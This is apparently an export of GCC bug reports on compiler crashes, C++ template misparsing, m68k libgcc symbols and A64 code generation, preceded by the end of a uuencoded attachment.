 M+*0RD*$%3R!5^K?'^2W7-$3R+=E(92FA\P!&lt;6.*1.L%&amp;D 8]J$$/5ZO5^W
 M]ORGV?QW=[(Q9N[R(9O$QF[O*AQA#CG[B?%(95KD_XH6J%1&amp;)$H!&lt;Z?D
 M^ 9H\==*3XX\::DLMMSGIG1[DAH#&gt;50*((!3#08#[D@
 M'V1.Y\-E/U[&amp;4-$PP0H!30C0@QE441 !0(!2OT2$ QL$VV0V)R_NZ^21&lt;
 MC'Z\4JZQ$4/=\7I^:#L&gt;6 _BWVB\QN/[(H*7$OLD_)C:1(&gt;*7$&lt;P6^
 MJ??]ZX3\$WXR$&gt;=&gt;KAX!K$TD7-2:H)#JWK&amp;PV'O/I-I]1\#\1Y$-7*$&gt;A?8#
 MEW%T(4A''&lt;G3VI!PY$$A**!260E_$23'GI)A2(SY
 M FD&gt;-*06:4I&gt;Q!&lt;69DC^4/J@%F:72@V2D3(WUB1(Z@JU@ N9FH$KAAA#9
 M9#.7=W+7D3?3]%+[/TQ$4P%1*FHB*8#O@(^XODU7[Q#AFA]&amp;^XEFTL I*)Q
 MWX3?C=WD7Z_TFS_!@XGQI)$#X8^EC=W558O=F4'8LH9/Z-WQ#]_QH5$$XR
 M-?D%TTZ_/(:FI8)&gt;*OF*$R:4[A7/A&gt;YE/H 
 MH1%.[\N52?@H:'0F2*!TBB(B(($@A\'&lt;8KEQJ8+
 M!*)(OAI\3:L&amp;NB!7640$XJFX#0[[([:P!!*Z)7AM[_756X.95: S*K2/ 0=
 M[Z 41X)VZF_H-^YI3@@#R2FI&gt;NZ=@?E &gt;N\5YO/:@H[G+)&amp;554@.L#&gt;ZD
 M[GI7F+DZ$H/C LNI &amp;Q&amp;RRN2$@ P$#)5M?NPPS&gt;DRXS=Z9=U
 MJP0U#/C!(((1PDB+00JB!+83VR&lt;F-V3V4UNK+6Y#&lt;Q D85&lt;[\*MVK%?P
 M-*[Z_:4[&lt;YR3NYTDJSK)8OHVVQ2%9HW'N-/G_
 MH.PQGNV&gt;_WG1K9?+2TDC2TFQOML2$FPAI#B$3
 MLMDD7:&gt;&gt;GL(&amp;QV(BWC(LC(LC(2N@]WE0@)WKT\4 3@2[+@?2CC?F* 
 M5V!!#R9.+!?F4&lt;#:9\41?W3+ZE*%F I'@D@\I(/+89_
 M+WAD*G+W'Z']\^^CXR$P--'ZI$_6G!3&amp;*T_'&amp;W'2&gt;2(AY _8' \2&lt;&lt;:T2
 MGY\XB311]/U/Z.-JB&amp;! 3TJ[QY
 M*4/ !)KCWK]L$ IA@'85#K(BH&gt;UA&lt;
 MZC9J@)*Q:^1F3/E[?9-9/D/3X*5*8$9P)IS#?L.P0OA^)3LYJS%0BV$$R&amp;5
 MKZD0&amp;D3[?&gt;&gt;X^A\.XT]]8TEVGTS6]*4A5.9=/4]&amp;^?I-[6J\C@0&amp;XX!]?&amp;
 M0BFY$:?-! #+ET^C/IDC%CH8EI&amp;A%1CBKE2 I7L*1#)[(N#J8( ?EW:F%6Q
 MB?1ER##  : J($&amp;22DI/MYB4E!0LAR*&amp;@#:JJAXA')S&lt;V0-@3]&amp;ACF0E[
 MYA
 M#(8ECFBA[$44X2!$FB1-0H89.5F8H1DY69B&amp;I$)BDC#6#C4560:@:E-2
 M!]TNIKB!-BFHI#)3/W?_X72)STS.58G. [)'4/)@B.HXC
 M*YL-\-:$[DO$%L8[$ #(0XP@V5M2:J )&lt;5_.(+&lt;55*169=2ECF32CB&amp;8XTE
 M#I'.BSC1&lt;(Z9HVV70%-K=:0KHTC=9L#Q#*U!*'$3 [IN11K7)=YN:=Y 
 MS##)[2/1.XXI(I1F*82N\B:CA.F=(ZT2'6.+1NF2X(SF#0&gt;3&gt;4+MH'*
 M)L%A[XF(:V=MZ0ZX)C#WX##B*3B7(&lt;?1]GROE5^6^5R]&amp;JJBJBIIF:@AFI
 MF!B BY 6FHB@KWEA'= ^GBJJJ.:/Q)N&gt;K]3WX(F!@ZV^'
 MZNF4-@%@*OZ0*./XVJ(&gt;@%
 M*!6P'+DGTVQX'ZSJ=%SI0:==Y(G$B^@.V4F)(OVD0:9:\AF[XA$&lt;LA!P$%
 M4LL&gt;!)!Q#-!&gt;-A'@ =*DL 1#G$Z(:]78G Z*)DO^!&lt;T:&amp;A!80(J2$?^C#
 MXH=&gt;/8A\9SDI._*DBLZR]Y-MC.8)!L(?!K[77HDEG\C+KW^M=NN1UX\3 0
 MMSQO%A)-DY#8*(@0%[$9LG*$1CLFGWN *E#C&gt;+9UU.1\^UMV 2&amp;E3
 M*3]&gt;GQGR[ A$-!P(W:PFOQ/$&gt;_U
 MB^Q&lt;SSSQ$1$1$SSSQ$1)PGJJE1#S87V8#ZP&amp;]A&lt;9A*9H)QD(@\
 MX?GF&gt;EIW.&amp;OY@[CTJ::Q$0]?4Y+9BQ(VT@7HTL
 MQ2!8DMA9#!3RL3KIIL5P&lt;HDH:C&amp;-30%7C#$ZO58:RP-1 (4D2A3KD0P:E
 M('E8:ZOE89(I@4PXWPD
 MA.%Y4/?]YH&amp;P)TB2G0@F*&gt;*WT('!]#UZ@H)1*#!30K^!*8/&lt;[XWX''(
 MNRA7C+XHM'!-TA :97
 M1K5885K0@P(BQ D+!-$H0 ^135DI(:E% EO L?5&amp;&amp;9!B4 EA)10!9MDE*9
 MB LAV&gt;.ZB:O.T'7'6T3.W-D#G.]+T@.!
 M#K+#8F$QF0-^F9&gt;!Z D'W@D'
 M6Z/8@:G+MWXA&gt;Q:N3P*#RAO 42!5ENAD'.-390*L![ H
 M&lt;+Z]=^KBY+ J&lt;XF&lt;AMA[H\(7^&amp;:D?IJJJ319^4.)%'QXOQRF1U(&amp;?'T&lt;$R
 MKUQ#[8K]$:(7&lt;D5QA$SL6!$:@5B
 M /O&gt;#8V8$R0H0:
 M:!QH/*0^0PPDV3(7!+OS!Y)DE)0XC2^3^/!-(1R K29 \0?JD[XQD5J
 MG?#2%X4R23:?Y^W81Z0CQ\K=?$O
 M:#8H*!4\_BC%HP&amp; 2I4 9&lt;IF^% 99T^9]TS M*?@:SXFV1343Y33&lt;4!BB)!W
 M'1=#6*R$C3X8(/CH6A*0'!8)D)YYZ'?S#M+F&amp;%M&amp;T(_ Q_7
 MNVX'B+0^:[]DBM2NPJ^USQQGF-^*99?Q\ISJ9L$Q'QX?70#&lt;78#=VYA.X4*
 MIB5%*JK(!!@YLR F3(A&lt;8G+)&lt;R')(T5-$A(0E )%.D0
 M):$%@T4/]M!:= DA(3(L\[.]V5IW%QG!)HH&lt;.B]#2501M@'3TXYL7&lt;C-+
 M442\6@W\!#RX!RB268T 3Z\Y!!@PIE3#!+9OWWPM[.$\=I&lt;
 MEU.\^V6C!@UM.'(WBG)D' :F(B@'&amp;9)Z^/CG&gt;&gt;226I40@6.F*8)(FQ]SWUG
 M3T&gt;]#R-%L9E557BF922ZRF
 M/=NY1SRJ*XJ3P3&lt;8)!PT+0%K@1P$D&amp;12]-%@12#C&amp;)-DQ!+$+SXPQWQA
 MEUZ9&lt;)R:-\G4Z]^7GEYR^-&amp;JTOJ\M[[0]NN:_@
 M@%\0+S4LMD9Y8%%-QW^/J_%(M:MED*X&gt;(FRE!&lt;Q5&amp;Y$BBP
 M'PH4%!*Z4+491GGRXU!RE\4*F++9S[
 M(ZQ?(2!\'(// [1E$0U_ (&gt;5Y4\L(
 ME'* NY-(YU@%NI*0('#E.0Z[&amp;0WIX\7]?
 MJ]_(*?G9'#CH)!-(\P80---!2)5*- M(4JOEY0X]6P&lt;D'$D%P+@Q GX#7@
 MBAY]K0L=Q!L*H1O '9=B(5[=[^!R[N[0TPFJ2M3WT'&amp;F4+3&gt;'L89I9%
 MVML3#5
 MH.N%CUS#_H T0PLP#H@$PIJK2/L[&gt;W6TE-8I%&amp;&gt;/-/3:&amp;%&gt;% &lt;C_/Q
 M37$G#3U&gt;JSCE\PW3D6DB0&amp;)S-MI-W![=1.&amp;FI?C.!?K]3OHC9L) [X%D3E+
 M4R6A(N5B)\-)^9 5#S)JB+.43XQB!(H&lt;.6?#L5Y*%[FIR[Q0$[:M\:#8! T
 M!HQJ: -BDB+(( 1 J@-!R=L4U !J!&amp;!G4=42:UI=.88 02/H$EBQ-*9+
 M)^1YR#^Z:3:20%JEX//8C#&gt;VW[$:\I2 0&amp;H9Y*$ ?6+[O1&gt;KU6L+^+%8)#09
 M#BX9655C8.RYC@SDX&amp;8E222)3[?47[!-TXH$6T@B\H9BH'I
 M.[JVXR:EBED1D/_!/Y/RYL 1+0H0$I0&gt;S\%04T&gt;\7[$ ?=3YJ!SXH&amp;[&gt;EDAT
 MI!%4C&lt;J-?=VD*]SN1.(83XBQ/?G111^\/G9@#RGP#1\/+\W\FZ&lt;JD
 M #4H+KG12Z&amp;S8:29FF*@YYYWB!XK#C1JU$8&lt;KWB3IAQO%L= 5=_?@/0D4*
 M #GSWC@'U+414K0003!'7#80$\EXO@@^Z0_9^'(@I3^P-RR@9
 M]^'FD=O9FEZ_H%$?K _F#T'E!0W#_  ^H) R&amp;A:&amp;@\@4(H&gt;WS]P*&amp;AA!$T(
 MBR&amp;H0]A1@]F!4/9%!B*&gt;R&lt;B#Z'/XO4:/0J*2 IE0I! U2^_[/Y='!T
 MYS=D):9&gt;$I1MX$I&lt;Z&lt;7?L2V$]KAS+%R($1#971+.!)&amp;@-U0+?^.J17E$
 M.*EKWP5B%%!MG)=F&gt;G. ^'P()J-!H]^#R'
 M@HZFG&gt;%$!3VP1:]_]E/M2!!K^X6A:ETA2DJAGF/+J3ICP[@
 M\ A(Y*HZ88@&gt;FG$1WZGR?=CPX:?%%#$YD=NL@\7CW75ZNS=KHI*]!A.$0
 M'9D#9G*I/8$2B+MF'J'***=&gt;UYQ#T2&amp;=K2JUW]F'4[W&lt; XP3$-RJ(%'$B
 MEEM7*E1LE1?? *F75#DGG029:KDF04+-G.%EB48_7&gt;
 M3N0$/0ZI?#(6%N']ZI-3-MKI'8]JI6XF
 M]=7([KH\2XIR6P FF-% RUF(U.Z@:$YC5- +A&lt;
 M-A=B@GN&lt;1QT&lt;2W(9@GNI'TS5?[[737%OZO*7&lt;Q#=X[]QOI+OU2*G[ %51F
 M*&lt; 04QJ=#L2PD@HKRC/S@DGT^S0.818[CKU@DTFPF1SGD\\E%4!
 M11'AN&gt;TH2%.?.!02Q?B@3^3J8K*'D)VQ ]=[WPZ'/
 MH\CW#PT4\1J46! H0D4)4SQ!6JY_7\-S*RT-PTT:@J)X&amp;_:BX'X9H
 M+[Q@D&gt;OPYJB#0@BFX0452)@FDI3.[8\.^\ZS)MW
 MS')YL.9$D$:6 7Q02E@&gt;$97?3H2DZS&amp;J
 MH2)63(!7)%P@[=&amp;:A!32FPN0&lt;) Q)'H@# E/@KZQM\U\U1H_:UAO(0&amp;%
 MT7.YMESN:NN(0%V#:8PRRS1ZTX'L C:=TI/P^4I65I??C:E1:5%I46E1:5%
 MI46E:Q$*48 -0B&amp;CLLDH-M6I@Q Q=X=TU.0W8NF_Z&lt;?9VK9'/70#GB@6Y 
 MASW[GG81I!LA 5Q/:/0IZ7KQJ%HCR7'IYU&lt;H9!QSB.H:5J(M=P#DZ'3[
 M&gt;CQ=@(1&gt;NJX
 MA(H/!M.12&lt;EG^)J-[-(.:(5W?:?LW?S($_64%S]G4 XG7P7GR0I4'7I3QVV
 M0W6X(CC=R!K^-E2Y@$.Y 8@D/Q$]JB7O[JKIP Y\@&lt;#9=YPBFYDI)Q( 
 MB:)Z?D5D!$P@)N/M0N0NI9#@?B DH#O.%O/OWUS09PH8SRM @8Q$^37
 M13S#(_(47DR#_7M.:Q X-(7HM&gt;LJZ!Z&lt;A[+&amp;ZDCW(&amp;CN0(0H@_O&amp;CL-3
 M&amp;-3K))?8 T2Z)0AQ[J%9#7#F!D!3N_O_/BA\Q 81 #KIU5J#1
 M(C\?E]H=_1= LVL462$S'Y .J2I?IG&lt;$C4GM?K06+2K[+'E
 M%A*.C00G0=*0I%=(+C]._O3+-S?C7#VS*.6&lt;&lt;AMMMS)3^5^[.5O)\LLR
 M5YPRNWZU)@C7%FL ]KO9
 MNIC'DX!.]$Q-(@6HB\!:99\\W83CVNI5(=/[G'DBO*=%86.
 M$Y9F9)B0=@21#1*0P^!AV8YU983&lt;FU^[\-$9$D4..99&amp;%43$39F%('&lt;! W
 M$LT !0V(&lt;1DC.Z#*T1$-]-&lt;*5CTWF\W/3S-KW+B$$KG*6 &lt;-M!2O-O&amp;
 M%Y_L:KJ8%Q3*ZF_ U1^'R$KU0?LHXVB*K^\9B*
 M0BATD &lt;3
 MRXHVI/$=@'.QOX0-C@ &gt;_/$\WF [&lt;WMP#[*]P8+
 M\JBDI'*JJA_(%)F2D+^S^(UR3!*R'$)9+@.M]+-?&amp;T8'JJ=CCW/V!=C U
 MATA&gt;W:D02MVM^$H&gt;-LA(!$B$T$L\B79TP0X+GL!^!LK.$]89X).]XT^N
 M%7Z[Y'M*+NPVGNNWQQ4R?6H+7@3VDH^Z4D)X0?)@%0$D0A \IX-E?R0O!
 MU#Q7MX^D#S V%Z5CZ&gt;.?0WAG7]()!==]?+QD&amp;MW3P!(&amp;&amp;Q&amp;YJ]/V$IU(X
 M_5.&gt;OK/7\SN3X@51 0W[$2CX_IZ^GV]5D0A$#YZPI0S571CQI\ S= @_!
 M0Q\!!8%.1DL&amp;J.7=9X(VKZ7R?/+&lt;$D^B5&lt;J:!62&amp;6@/EG  0*$+MU//'X'
 M4E&gt;(&gt;X. ^.TN*H'G[RLK&gt;N\^B93QX!'V3$O:9(#X^!])1(\ S8-P=QU.]'
 M:8O_AB# CJ9P0VGBA[M[G[8Z]0Z\T'B[SWOZLSTP%-(Y108&gt;9_?V:/\4
 M#[I[?W\&amp;.?5Q&amp;ZUM??LY5O?$E*#$WUN!-J4ZDD0$)?N#+I3 ]VLSX!+G37V
 M.[T^()!ZYL7K8'A717[M.\! =YN2M))^OO^K+=J!&gt; O6A3L&gt;]\3CL.ME1F&gt;3
 M%AX3.#](.'F-*R2$.KU+:U*VHU6U%5M6M15M5M5M5M5JU55:6BB*(H
 MBB+$LI:UJJJJVJJJJKR1A4J2%LA9$21H7-566!1@4&amp;)2 6VU6U6U6U6U6&amp;
 M/.QA*R20(&lt;M+2JXPX6TCAE.PR$&lt;F&amp;#1J-D-+%0F54%I4
 M''(3957(H1KBH F0K@Q*2 &lt;.N7'&amp;&amp;.3@:9C$!$S4BY'7 S*LJ
 M368#+B'@8845 T5321NID!#4#2M B:M))B005F9(Q6)@5EEE9F4$P662%
 MIB[DNE(AAU@/&lt;@U*%*Q&lt;%%FT5HU$3#A%%3($A..8!A43&lt;2)J!F*.1S?2N:#!
 MW49#:JJJJJJVBRL*L*@Y'*.1*@A9IYFQ6A]4.OX]:P?0
 MQ2P4SY[VWOO B!.8S^+P0C7:'[G+8?(4_9+Q =&gt;FU=JZ6-F/&amp;G(JIU
 M95.5+CUIX_-MPU!S-M@/=3M
 MAMW@\DBG?#CQ!CP V.Y4%-65EE-EA&amp;
 M95Y\&lt;J2J6KQ-PZD+Y9 \#QW-+KOKQ*Y8.G)K 9!-XD!=9(&amp;I!SN
 M8QTL47B+TX!CEFTN7-.L++D1:HDEAE I3@J9CUH2J6:01LY9G6
 M%^3*P:7BZ2-I:!O&lt;@F(6JFB$ ($T :XR^YYHPN3EK)MF(]T\&lt;E*EWR2
 M^S=$]'H6B:[F.:]TYK=5 ]K&amp;
 MC/OO$T%[-B[A&amp;&gt;&gt;6:SRHNQ$90D([[P$(-2A&lt;(+ZQM#8 3$LI9=UP%_C#-BW
 M6Q-X FH/S=J%EE84A[PAY\YYL (E2F%@2XL*[M@DMTQTQ5#IOB&amp;[
 MUX%_'D^'\/6ZZX]73ZST$+COY1O.AAJ== R'YH')RH=20I@ZR0=C#@E]DQ
 M3T&gt;S[1YD8]1O#K$*E#S^&lt;VF)SGW5E&lt;42IWY-QI#[N-TD%B^J.V-A^M]6F
 MURMA@UB5[MNY(R-H@$ST3EI3&amp;&lt;V^%^W Y#$50*:.9FB^\K\
 MZXL1ZF6?&gt;=3L!'/._#VL26Z1JO%$$K(/Y1B]QA3P&lt;(3'( $PA1I6
 M88 I54*$*2PP%QP\0.AYB*'F4&amp;@&amp;8=+KA!V@IX052F@&amp;&gt;!1R.IJ&gt;70O$&amp;
 M38A(D0D$7F%GA $@#-WIF)C&amp;(X'Q6C)!DSQ22S O9 AS-Z0K !H*$%4!
 MH.EFD3A.-&gt;O0ZM+V+S!(--6]P&gt;$&amp;P#$5H V&gt;#G'(6R%#TS.R&lt;V'ZZ
 MVQ7Q@AG39-!D&amp;$Y-!$Y)
 M\3D91$0-M$-++0R&amp;]8\CR#B$Y0_
 MO^\]_W^8J4H4I0='X]QQ4_A!]J@H'S&gt;3HF3:T!?MZ@/P(B$BBNM4)P#Z J^
 M.VLSO?UW\..=+TX]P/+9']!ZI2CW2ENW:HXY9K
 M.?'Q#-S7-^5Z[:5IIML&amp;1&lt;)ZH@HRHA[I 3NIZRSX)*HG0FBJ%**$1D0?P_T
 MTJ]!E8ZB]!&amp; \+%F_XA0?:$X
 MU#Z29AS]V WDIBXFET7P6C)8&amp;ASA#0O0I#PJ*'$SYBE#R$Y!A$0XF8YS%Z\
 MN)LFP]1R89*J'$CK-XI0[#P_2]SU5/7/0WM&lt;4$HP/%W\CF!2I)KP:]AP '3
 MX3YLQ%]@$+W0%12O.8'AE.&gt; Y@2_2@KR/=R/0@@$DS]:&gt;@[[?7KA'A5\21$
 M-R+H(QCF)J'@CRV*#&lt;&lt;Z-MJ-^_R\(MW%B&amp;U7?4R=H&amp;F* 9 
 M) _&gt;&gt;ZNI%1AEZVF.P$/&gt;=\-\H_'AQ-$A2IP0Q9 ]U5.&lt;?*^):F./KR&lt;N)RQ
 M0&lt;YR51QE]*K'$\
 MW$YR-GRWEB&amp;FD@9=?]FW-R1F+2:%:=---24M9F1X_P&gt;_GY[Z?I/VN^QP4
 M414$317P.7*??S^77T0%'X\3&gt;H3) T$=!N_0P-/\G\MBY%C @&amp;8NB &gt;LKX 
 M=J(A4OOKO=W=WCW@U(/??S3)-NPS#106\:--ZYF#V^2.^@(Q:Q)5*:PXJ(
 M.Y9+S8D9!Y0IDLL^=KV5B8BF04/D=V^I05R-7A $X+C'C'W'WWQ^]^'M
 MV^/T[0I\^B#2*Q'8ER#M_8#?5WYWP):%_3XNAT&lt;BA@$$@-(\(.Q8XP UL
 M]\2TA=NS.[@R!P1)8*8B)T+LWSKQ\?U:DX5&amp;H0*E7G$(CJ!$H*JBTE)A
 M0IB2)% \)1R6E4U)2G0QU1/AF_# K-IL_&lt;=U:CQ3B1/*)W-E\C 0(%F#!.\
 MFN.^ B&lt;(B.(J?\9%(@$%2SI''K)H)A&lt;B\Z (PQ&amp;32O=30 &amp;%D21OS9N
 M.!/$WT[NUDBAROS'0+VA&lt;$/ZYC=LJ'2I7&amp;Y7N^NCY7TJ@^4 Q''..C]@A
 M[75V=(UZ&lt;OD)X0&amp;4D9!BAPG\9 ? @OR&amp;*&amp;2790W8D[!\1^P)1C]PILCWM\
 MR(I_^(2'AV)I7#0[\-5&lt;B&amp;%.AH%=(FIR4Z$0HZ%.Z&amp;X=E2!T%.6)SY60_:
 @&lt;C8*/O*RMYXP2A*3(X@O=B?K)'_^+N2*&lt;*$A])4QOBX
 end
Release:
unknown</t>
  </si>
  <si>
    <t>robert_creager</t>
  </si>
  <si>
    <t>GCC-65655</t>
  </si>
  <si>
    <t>[5 Regression] ICE in speculative_call_info at cgraph.c:1151</t>
  </si>
  <si>
    <t>Created attachment 35206
testcase.ii
g++ -std=c++11 -fsanitize=undefined -O2 input.ii
fails now with
input.ii:49:1: internal compiler error: in speculative_call_info at cgraph.c:1151
 }
 ^
0x92b9ae cgraph_edge::speculative_call_info(cgraph_edge*&amp; cgraph_edge*&amp; ipa_ref*&amp;)
        ../../gcc/cgraph.c:1151
0x92ba8c cgraph_edge::resolve_speculation(tree_node*)
        ../../gcc/cgraph.c:1166
0xb2c5a3 redirect_to_unreachable
        ../../gcc/ipa-inline-analysis.c:773
0xb2c5a3 edge_set_predicate
        ../../gcc/ipa-inline-analysis.c:797
0xb2e161 inline_edge_duplication_hook
        ../../gcc/ipa-inline-analysis.c:1325
0x92c403 symbol_table::call_edge_duplication_hooks(cgraph_edge* cgraph_edge*)
        ../../gcc/cgraph.c:458
0x92c403 cgraph_edge::make_speculative(cgraph_node* long int)
        ../../gcc/cgraph.c:1085</t>
  </si>
  <si>
    <t>GCC-19200</t>
  </si>
  <si>
    <t>Friend declaration misinterpreted as constructor</t>
  </si>
  <si>
    <t>Hello:
-------------------------------
struct S {
   struct T{}
   friend void S(T)
}
-------------------------------
lookup.cc:3: error: return type specification for constructor invalid
lookup.cc:3: warning: member functions are implicitly friends of their class
G++ thinks that the friend declaration is declaring the constructor (with an 
invalid return type specification) as friend. This is bogus of course.
It might be a regression but it was there at least in 3.3.</t>
  </si>
  <si>
    <t>GCC-79781</t>
  </si>
  <si>
    <t>ICE on valid C++ code with -std=c++14 (in assemble_integer at varasm.c:2733)</t>
  </si>
  <si>
    <t>We do ICE on a LLVM test-case:
g++ const-init.cpp -std=c++14
const-init.cpp:91:17: internal compiler error: in assemble_integer at varasm.c:2733
 X x = {(long)
                 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Looks clang++ accepts the code.</t>
  </si>
  <si>
    <t>GCC-5639</t>
  </si>
  <si>
    <t>[Cygwin] Internal compiler error on lifted class</t>
  </si>
  <si>
    <t>The attached c_grammar.ii file was generated on the crash.
Original compilation command:
g++ c_grammar.cpp -O2 -ftemplate-depth-50 -save-temps -v
Step that crashes:
/usr/lib/gcc-lib/i686-pc-cygwin/2.95.3-5/cc1plus.exe c_grammar.ii -quiet -dumpbase c_grammar.cc -O2 -version -ftemplate-depth-50 -o c_grammar.s
Messages:
c_grammar.cpp:332: Internal compiler error.
c_grammar.cpp:332: Please submit a full bug report.
c_grammar.cpp:332: See  for instructions.
Applying the following diff to the c_grammar.ii file (it just adds a line of code) compiles just fine:
39244a3924539246
&gt;       symbols keywords
&gt; 
That was generated as:
diff Bug/c_grammar.ii Works/c_grammar.ii
The problem is probably caused by the extremely heavy use of templates and/or the huge initialization list of the class in question.
Release:
2.95.3-5 (cygwin special)
Environment:
CygWin on Windows 2000 Professional
How-To-Repeat:
Just compile the file:
g++ c_grammar.ii -O2 -ftemplate-depth-50 -save-temps -v</t>
  </si>
  <si>
    <t>jcab</t>
  </si>
  <si>
    <t>GCC-79308</t>
  </si>
  <si>
    <t>ICE on specialization of nested template classes (in finish_member_declaration at cp/semantics.c:2963)</t>
  </si>
  <si>
    <t>Created attachment 40639
Source code
The following code (attached as element.cpp) causes the error
	internal compiler error: in finish_member_declaration at cp/semantics.c:2966
when compiled by calling
	gcc -v -save-temps -Wall -Wextra -std=c++11  element.cpp
with GCC 6.3.0. The nearly same error is caused by GCC 5.4.1 and GCC 4.8.
---------------------------------------
template 
struct Element
{
	Element(void)
	{
		WriteOutput()
	}
	template 
	struct WriteOutput
	{
	}
}
template 
template 
struct Element::WriteOutput
{                                       // line mentioned in error message
	void foo(void)
	{
	}
	virtual void bar(void)
	{
	}
}
Element e
---------------------------------------
The error disappears on each of the following changes:
* Remove one of the element functions in the specialization.
* Remove the virtual of all element functions.
* Make the specialized type-argument of the outer template different from the unspecialized template type-argument of the nested template. As long as they are the same no matter which actually the error is triggered.
In these case the compiler complains correctly about the missing main function.
If I find out how to attach another file I will attach the whole compiler output.</t>
  </si>
  <si>
    <t>bjhend</t>
  </si>
  <si>
    <t>GCC-32381</t>
  </si>
  <si>
    <t>m68k undefined symbol __cmpsf2_internal</t>
  </si>
  <si>
    <t>This bug has been introduced by Paul Brook on 29/12/2005.
See the diffs here :
http://gcc.gnu.org/viewcvs/branches/gcc-4_2-branch/gcc/config/m68k/lb1sf68.asm?r1=109143&amp;r2=109145&amp;diff_format=h
It occurs when building some executables on m68k targets where __USER_LABEL_PREFIX__ is not defined or not empty.
When ld tries to link a program with _float.o inside libgcc.a it fails with :
...lb1sf68.asm:3759: relocation truncated to fit: DISP16 against undefined symbol `__cmpsf2_internal'
The problem is in the file gcc/config/m68k/lb1sf68.asm in the definition of the function SYM (__cmpsf2).
There is function call using bsr (__cmpsf2_internal) but the target function was defined with SYM (__cmpdf2_internal)
The macro SYM prepends __USER_LABEL_PREFIX__ to its argument.
If __USER_LABEL_PREFIX__ is defined to an empty string (like ELF) the bug is not visible. But if it is defined to something else (like _ by default) the bsr references a symbol named __cmpsf2_internal which will stay undefined because the actual definition contains 3 leading underscores.
This problem is present in the definition of the function __cmpsf2 but the similar function __cmpdf2 is ok.</t>
  </si>
  <si>
    <t>vincent.riviere</t>
  </si>
  <si>
    <t>GCC-32249</t>
  </si>
  <si>
    <t>%s substituted with interface/class can't be properly translated</t>
  </si>
  <si>
    <t>In gcc/java/parse.y there is this code:
	parse_error_context
	  (cl Public %s %qs must be defined in a file called %
			     (is_interface ? interface : class)
			     IDENTIFIER_POINTER (qualified_name)
			     IDENTIFIER_POINTER (raw_name))
The strings substituted for the first %s are not available for translation.  But as it is written they are the English words not the syntactical tokens.  So this can not be properly translated.  Even if the words were markes for translation in isolation composing a sentence like this is not in general possible to do for an arbitrary language.  It needs to be split into two separate messages</t>
  </si>
  <si>
    <t>GCC-8966</t>
  </si>
  <si>
    <t>[Alpha OSF5.1] Lost exceptions across library boundaries</t>
  </si>
  <si>
    <t>Previous bug reports have identified that exceptions thrown across shared object boundaries are lost.  This test case demonstrates the error for exceptions thrown across static library boundaries.
Release:
gcc-3.2
Environment:
alphaev67-dec-osf5.1
How-To-Repeat:
* Compile ns1_exceptionBug.cc and add to libA.a
* Compile ns2_exceptionBug.cc and add to libB.a
* Compile demoExceptionBug.cc link with libA.a and libB.a
* Execute the resulting a.out
(Sorry if there are syntax errors in the attached source.  I had to retype it on my PC to send this report.)</t>
  </si>
  <si>
    <t>GCC-58622</t>
  </si>
  <si>
    <t>With -fomit-frame-pointer A64 does not generate post-decrement stores</t>
  </si>
  <si>
    <t>In A64 if one compiles a simple program under -O3 one gets code like this:
int bar(int i)
int foo() { return bar(5)+4 }
A64 -O3 assembly:
foo:
        stp     x29 x30 [sp -16]!
        add     x29 sp 0
        mov     w0 5
        bl      bar
        add     w0 w0 4
        ldp     x29 x30 [sp] 16
        ret
Note the use of update-form loads and stores for the SP.
But if one uses -O3 -fomit-frame-pointer the following is obtained:
foo:
        sub     sp sp #16
        mov     w0 5
        str     x30 [sp]
        bl      bar
        add     w0 w0 4
        ldr     x30 [sp]
        add     sp sp 16
        ret
The sub and str could be merged into str x30 [sp #-16]! and the ldr/add could be merged into ldr x30 [sp] #16 (if I have my assembly correct) as they were in the with-frame-pointer case.  On some ARM implementations the updates are for free so one would get better performance with the merged load/store instructions not to mention better instruction-cache density.
Note that under A32 identical code (using update/post-decrement stores) is generated regardless of omit-frame-pointer settings.</t>
  </si>
  <si>
    <t>mshawcroft</t>
  </si>
  <si>
    <t>b.grayson</t>
  </si>
  <si>
    <t>GCC-70598</t>
  </si>
  <si>
    <t>Fortran OpenACC host_data construct ICE</t>
  </si>
  <si>
    <t>As once reported in  and thereabouts there is no execution (libgomp) testing of the Fortran OpenACC host_data construct and the one test case present on gomp-4_0-branch libgomp.oacc-fortran/host_data-1.f90 runs into an ICE (for trunk as well as gomp-4_0-branch).  Please have a look at that and also increase test coverage (for example by translating C/C++ execution (libgomp) test cases if applicable).
As the implementation of OpenACC host_data/use_device has been completely re-done during patch review (to match OpenMP's use_device_ptr clause) I suppose it's possible that there is some middle end infrastructure missing to deal with constructs generated by the Fortran front end.  Maybe Jakub can advise on that in case he's already started implementing the Fortran support for OpenMP (which is currently missing).  Or maybe the ICE is due to something completely different.  -)</t>
  </si>
  <si>
    <t>GCC-39863</t>
  </si>
  <si>
    <t>[c++0x] variadic templates : wrong error mismatched argument pack lengths</t>
  </si>
  <si>
    <t>The following code :
======================================
template 
struct A {}
template 
struct S {}
template 
A... &gt; f(U... u)
{ return A... &gt;() }
int main()
{
  f(0.0)
}
============================================
compiled with g++ -std=c++0x on today's trunk produces :
test_variadic_2.cpp: In function 'int main()':
test_variadic_2.cpp:13: error: mismatched argument pack lengths while expanding 'S'
test_variadic_2.cpp:13: error: no matching function for call to 'f(double)'
I believe this is a bug and the code should be accepted.</t>
  </si>
  <si>
    <t>GCC-68751</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/sancov/asan.c  (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/sancov/asan.c   -fno-diagnostics-show-caret 
-fdiagnostics-color=never    -O0  -fsanitize-coverage=trace-pc -fsanitize=addres
s -fdump-tree-optimized -S   -o asan.s    (timeout = 300)spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /test/gnu/gcc/gc
c/gcc/testsuite/gcc.dg/sancov/asan.c -fno-diagnostics-show-caret -fdiagnostics-c
olor=never -O0 -fsanitize-coverage=trace-pc -fsanitize=address -fdump-tree-optim
ized -S -o asan.s
cc1: warning: -fsanitize=address and -fsanitize=kernel-address are not supported
 for this targetcc1: warning: -fsanitize=address not supported for this target
output is:
cc1: warning: -fsanitize=address and -fsanitize=kernel-address are not supported
 for this targetcc1: warning: -fsanitize=address not supported for this target
FAIL: gcc.dg/sancov/asan.c   -O0  (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-11636</t>
  </si>
  <si>
    <t>[3.3 Regression] Internal compiler error: segmentation fault</t>
  </si>
  <si>
    <t>&gt; g++ -v 
